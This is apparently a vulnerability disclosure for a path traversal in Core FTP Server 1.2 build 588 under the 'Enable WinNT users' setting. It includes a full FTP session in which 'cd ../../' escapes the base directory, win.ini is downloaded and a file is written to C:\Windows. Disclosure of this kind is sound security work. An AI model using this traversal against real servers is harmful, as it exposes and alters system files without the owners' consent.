Configuration
Core FTP Server 1.2 build 588 (32-bit or 64-bit), released on April 7, 2016, was installed. This finding is based on setting the “domain properties” via the GUI so that the “Base directory” is C:\Users\Public and the authentication method “Enable WinNT users” is checked. The “Enable WinNT users” authentication method allows the remote user to log in as one of the existing Windows users. No other major settings were altered. On the server where Core FTP Server is installed, we added a native Windows administrative user cleverly named “admin”.
A Case of Documentation?
The documentation for Core FTP Server is fairly minimal, enough to get it configured and working. However, the "Enable WinNT users" functionality (the small check box in the second image at http://www.coreftp.com/server/help/Create_Domain.htm) comes with no warning or explanation of what it implies, beyond the fact that native Windows accounts are used for authentication. Historically, FTP servers set a 'base directory' much like web servers set a 'docroot', with the intention that this location is the highest point in the directory tree a client can access. Historical traversal attacks bypassed that limitation, allowing access to files and/or directories elsewhere on the system. Based on the relevant documentation:
http://www.coreftp.com/server/help/help_/GettingStarted.htm
5: Choose a base directory where all directories and user directories will exist.
If you are choosing a networked drive, you may need to modify the account in the Core FTP Server's service properties, as the system account may not have access to the network drive.
http://www.coreftp.com/server/help/Add_account.htm
As a reminder, if you lock a user in their home directory, they will not be able to access virtual paths.
However, locking a user in the home directory doesn't work with NT Auth. Based on the above, an administrator installing Core FTP may reasonably expect it to limit users to the configured Base Directory and its subdirectories.
Relative Path Traversal
Logging in as "admin" to the target machine when 'Enable WinNT users' is configured, one would expect Core FTP Server to restrict the user to C:\Users\Public and its subdirectories. However, using a simple traversal (e.g. ../../) via the 'cd' command, an attacker can traverse directories to see “C:\”, download files (e.g. win.ini from C:\Windows), and create files (e.g. “albino_lobster.txt” in C:\Windows):
madagascar:~ tenrec$ ftp admin@192.168.1.3
Connected to 192.168.1.3.
220-Core FTP Server Version 1.2, build 588, 64-bit, installed 0 days ago Unregistered
220-Hello Friend
220
331 password required for admin
Password:
230-Logged on
230
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
227 Entering Passive Mode (192,168,1,3,237,224).
150 Opening ASCII mode data connection
dr-xr-xr-x 1 owner group 0 Jul 14 2009 Capybara
dr-xr-xr-x 1 owner group 0 Jul 14 2009 Downloads
dr-xr-xr-x 1 owner group 0 Jul 14 2009 Music
dr-xr-xr-x 1 owner group 0 Jul 14 2009 Pictures
dr-xr-xr-x 1 owner group 0 Nov 21 2010 Recorded TV
dr-xr-xr-x 1 owner group 0 Jul 14 2009 Warez
226 Transfer Complete
ftp> cd ../../
250 CWD command successful
ftp> pwd
Remote directory: /
ftp> ls
227 Entering Passive Mode (192,168,1,3,237,227).
150 Opening ASCII mode data connection
dr-xr-xrwx 1 owner group 0 Apr 4 12:39 cygwin65
dr-xr-xr-x 1 owner group 0 Apr 18 10:30 Program Files
dr-xr-xr-x 1 owner group 0 Apr 18 13:54 Program Files (x86)
dr-xr-xrwx 1 owner group 0 Apr 18 10:29 Python9000
dr-xr-xr-x 1 owner group 0 Apr 18 14:59 Users
dr-xr-xrwx 1 owner group 0 Apr 18 16:58 Windows
226 Transfer Complete
ftp> cd Windows
250 CWD command successful
ftp> get win.ini
local: win.ini remote: win.ini
227 Entering Passive Mode (192,168,1,3,237,248).
150 RETR command started
403 2.88 MiB/s
226 Transfer Complete
403 bytes received in 00:00 (1.32 MiB/s)
ftp> put albino_lobster.txt
local: albino_lobster.txt remote: albino_lobster.txt
227 Entering Passive Mode (192,168,1,3,238,4).
150 STOR command started
100% |********************************************************************************************************| 4 2.00 KiB/s 00:00 ETA
226 Transfer Complete
4 bytes sent in 00:00 (1.52 KiB/s)
Note that if you log in as a non-administrator, you cannot write to C:\Windows: the traversal escapes the configured base directory, but the NTFS permissions of the Windows account you authenticated as still apply.